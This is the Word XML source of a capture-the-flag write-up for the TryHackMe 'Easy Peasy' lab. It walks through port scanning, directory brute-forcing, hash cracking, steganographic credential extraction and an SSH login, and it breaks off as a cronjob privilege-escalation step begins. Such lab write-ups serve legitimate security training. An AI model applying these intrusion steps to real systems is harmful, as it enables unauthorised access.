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color w:val="5D6D7E"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">TryHackMe | CTF Write-Up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C0392B"/>
          <w:sz w:val="40"/>
          <w:szCs w:val="40"/>
        </w:rPr>
        <w:t xml:space="preserve">📚 EASY PEASY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D6D7E"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Linux • Web Enumeration • Cronjob Privilege Escalation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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🖥 Machine Information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300"/>
      </w:tblGrid>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Machine Name</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300"/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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Easy Peasy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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">IP Address</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">10.10.139.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Difficulty</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300"/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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Easy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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">OS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Linux</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Category</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300"/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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Enumeration | Steganography | Privilege Escalation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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Platform</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">TryHackMe</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2800"/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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Date Completed</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300"/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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">________________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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Completed By</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="6300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B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Prassanna Balaji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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">🛠 Tools Used</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ nmap – Network &amp; service scanning</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ DirBuster – Directory &amp; file brute-forcing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ CyberChef – Encoding/decoding &amp; hash analysis</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Hashcat – Local hash cracking</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Online hash-cracking database – Cracking a hash Hashcat couldn't</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Steghide – Extracting hidden data from an image</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Netcat (nc) – Reverse shell listener</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="200"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="C0392B" w:sz="12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C0392B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">🔍 Reconnaissance &amp; Enumeration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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 1 — Nmap Scan</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Started with a full TCP port and service/version scan against the target.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B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">nmap -A -p- 10.10.139.49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F1C40F" w:sz="4"/>
          <w:left w:val="single" w:color="F1C40F" w:sz="4"/>
          <w:bottom w:val="single" w:color="F1C40F" w:sz="4"/>
          <w:right w:val="single" w:color="F1C40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EF9E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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ Key Discovery!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Three open ports were found: 80 (nginx), 6498 (SSH), and 65524 (Apache). Two separate web servers meant two separate enumeration paths before touching SSH.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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 2 — Port 80 Enumeration</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The site on port 80 just showed the default nginx welcome page, and the page source and robots.txt didn't reveal anything useful. Ran DirBuster against it with a medium wordlist to hunt for hidden paths.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">dirbuster  -u http://10.10.139.49/  -l /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt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27AE60" w:sz="4"/>
          <w:left w:val="single" w:color="27AE60" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="27AE6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AF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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ Directories Found!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">/hidden/  and  /hidden/whatever/  — both pages only displayed a background image with nothing clickable.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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 3 — Flag 1: Hidden Encoded String</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The /hidden/ page's source was clean, but /hidden/whatever/ had a hidden &lt;p&gt; tag containing an encoded string. Fed it into CyberChef and decoded it — that was flag #1.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="3498DB" w:sz="4"/>
          <w:left w:val="single" w:color="3498DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="3498D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BF5F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631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">❓ Q: Where was Flag 1 found?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EAFAF1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449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ A: Hidden &lt;p&gt; tag in the page source of /hidden/whatever/, decoded via CyberChef.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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 4 — Port 65524 Enumeration &amp; Flag 2</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Port 65524 showed the default Apache2 Debian install page. Checked robots.txt (visible per the Nmap scan) and found a suspicious 'User-Agent' value that looked like an MD5 hash rather than a real browser string.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User-Agent:*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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Disallow:/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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Robots Not Allowed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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">User-Agent:a18672860d0510e5ab6699730763b250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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Allow:/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Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Tried a few things to crack it:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Sending that string as a custom User-Agent header — no change in behaviour</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ Cracking locally with Hashcat — no match</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">▸ A couple of generic online hash-crackers — no match</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Eventually found a specific online cracking database that had it in its lookup table — that cracked hash was flag #2.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="3498DB" w:sz="4"/>
          <w:left w:val="single" w:color="3498DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="3498D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BF5F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631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">❓ Q: Where was Flag 2 found?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EAFAF1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449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ A: Hash string inside robots.txt on port 65524, cracked using an online hash database.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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 5 — Flag 3: Hiding in Plain Sight</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">No tool needed for this one — flag #3 was embedded directly in the default Apache page's boilerplate configuration text, easy to miss if you just skim past it.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="3498DB" w:sz="4"/>
          <w:left w:val="single" w:color="3498DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="3498D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BF5F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631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">❓ Q: Where was Flag 3 found?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EAFAF1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449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ A: In the visible body text of the default Apache page on port 65524.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C0392B" w:sz="12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C0392B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">💥 Exploitation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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 6 — Finding the Next Hidden Path</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The room hinted at another hidden directory. DirBuster came back empty this time, so checked the page source manually and found a hidden &lt;p&gt; tag noting the string inside was Base64 encoded.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Decoded it in CyberChef, which revealed the path to a new hidden page.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="20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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 7 — Steganography &amp; Credential Extraction</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The new page rendered a 'Matrix code rain' background with nothing clickable. Its source code contained an embedded image (binarycodepixabay.jpg) plus another hash string, hinted to be a password hidden inside the image.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Cracked the hash using the same online database as before, giving a password. Used that password with Steghide to extract hidden data from the image:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">steghide extract -sf binarycodepixabay.jpg</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">That produced secrettext.txt:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat secrettext.txt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27AE60" w:sz="4"/>
          <w:left w:val="single" w:color="27AE60" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="27AE6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AF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2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">⚡ Credentials Found!</w:t>
            </w:r>
          </w:p>
          <w:p>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:color w:val="1B2631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">Username: boring   |   Password: (binary string — decoded to plaintext using a binary-to-text converter)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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 8 — SSH Login &amp; User Flag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B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Command Used:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">ssh -p 6498 boring@10.10.139.49</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Logged in successfully (the box greets you with a fake military-monitoring banner). Grabbed the user flag:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="1C2833" w:sz="2"/>
          <w:left w:val="single" w:color="1C2833" w:sz="2"/>
          <w:bottom w:val="single" w:color="1C2833" w:sz="2"/>
          <w:right w:val="single" w:color="1C2833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C283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ECC71"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">cat user.txt</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:spacing w:after="60"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The flag text looked scrambled — it turned out to be ROT13-encoded. Ran it through a Caesar cipher decoder set to ROT13 to reveal the real flag.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
          <w:top w:val="single" w:color="3498DB" w:sz="4"/>
          <w:left w:val="single" w:color="3498DB" w:sz="4"/>
          <w:bottom w:val="single" w:color="27AE60" w:sz="4"/>
          <w:right w:val="single" w:color="3498D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BF5F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631"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">❓ Q: What was needed to read the user flag?</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:shd w:fill="EAFAF1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449"/>
                <w:sz w:val="21"/>
                <w:szCs w:val="21"/>
              </w:rPr>
              <w:t xml:space="preserve">✅ A: A ROT13 decode — the flag was stored rotated inside user.txt.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C0392B" w:sz="12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C0392B"/>
          <w:sz w:val="30"/>
          <w:szCs w:val="30"/>
        </w:rPr>
        <w:t xml:space="preserve">⬆ Privilege Escalation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2631"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">STEP 9 — Vulnerable Cronjob</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:after="140"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:color w:val="1B2631"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">The room hints pointed to privilege escalation via a vulnerable cronjob. Checked the system crontab:</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblW w:type="pct" w:w="100%"/>
        <w:tblBorders>
